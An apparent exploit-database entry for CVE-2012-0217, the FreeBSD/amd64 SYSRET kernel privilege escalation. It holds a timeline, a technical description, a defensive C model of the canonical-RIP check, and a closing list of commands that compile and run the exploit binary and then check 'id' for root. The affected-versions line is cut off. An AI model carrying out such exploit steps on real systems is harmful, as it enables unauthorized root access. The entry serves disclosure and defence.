Timeline :
Vulnerability discovered by Rafal Wojtczuk
Coordinated public release of the vulnerability on 2012-06-12
FreeBSD PoC provided by fail0verflow on 2012-07-05
PoC provided by :
Rafal Wojtczuk
John Baldwin
fail0verflow
Reference(s) :
CVE-2012-0217
OSVDB-82949
FreeBSD-SA-12:04.sysret
Affected version(s) :
All supported versions of FreeBSD previous
Tested on FreeBSD 9.0-RELEASE
Description :
FreeBSD/amd64 runs on CPUs from different vendors. Because CPUs from different vendors behave differently in 64-bit mode, the sanity check the kernel performs when returning from a system call may be insufficient. Specifically, when the kernel executes SYSRET with a non-canonical return address (RIP) in the trap frame, Intel CPUs raise a general protection fault (#GP) while still in kernel mode, after the user-controlled stack pointer has already been loaded, so the fault handler runs on a stack chosen by the attacker; AMD CPUs instead deliver the fault in user mode, which is what the kernel expected. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash. To exploit this vulnerability, an attacker must be able to run code with user privileges on the target system.
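The check the syscall return path needs is a canonical-address test on the user RIP before SYSRET is issued, with a fallback to IRET (which takes any fault with the kernel stack still in place) for anything else. The following is an added illustration written for this entry, not FreeBSD kernel code and not taken from any of the PoCs; it models the decision in plain C with an assumed 48-bit virtual address space and an assumed user/kernel split at 0x0000800000000000, which matches the usual amd64 layout but is hard-coded here for the example:

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Assumption for this example: 48-bit virtual addresses, as on current
 * x86-64 parts. A canonical address has bits 63..47 all equal to bit 47. */
#define VA_BITS 48

/* True when va is canonical: the top (64 - VA_BITS + 1) bits are all 0 or all 1. */
bool is_canonical(uint64_t va) {
    uint64_t top = va >> (VA_BITS - 1);            /* bits 63..47 */
    return top == 0 || top == (UINT64_MAX >> (VA_BITS - 1));
}

/* Assumed split: user space is the low canonical half. */
#define USER_MAX 0x0000800000000000ULL

enum exit_path { EXIT_SYSRET, EXIT_IRET };

/* Model of the return-to-user decision. Only a canonical, user-space RIP may
 * be handed to SYSRET. A non-canonical RIP would make an Intel CPU #GP in
 * ring 0 with the user RSP already loaded; routing it through IRET instead
 * keeps the fault on the kernel stack and delivers SIGSEGV as expected. */
enum exit_path choose_exit_path(uint64_t user_rip) {
    if (is_canonical(user_rip) && user_rip < USER_MAX)
        return EXIT_SYSRET;
    return EXIT_IRET;
}

/* Constructed sample return addresses: a normal user text address, the first
 * non-canonical address above user space, and a kernel-half address. */
int main(void) {
    const uint64_t samples[] = {
        0x0000000000400000ULL,
        0x0000800000000000ULL,
        0xffff800000000000ULL,
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint64_t rip = samples[i];
        printf("rip=0x%016llx canonical=%d path=%s\n",
               (unsigned long long)rip, is_canonical(rip),
               choose_exit_path(rip) == EXIT_SYSRET ? "SYSRET" : "IRET");
    }
    return 0;
}
```

A user process can cause the kernel to return to an arbitrary RIP, for instance by returning from a signal handler with a forged context, so the check has to be made on every return path that ends in SYSRET, not only in the system call handler proper.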
Commands :
uname -a
id
gcc -o CVE-2012-0217-sysret_FreeBSD CVE-2012-0217-sysret_FreeBSD.c
./CVE-2012-0217-sysret_FreeBSD
id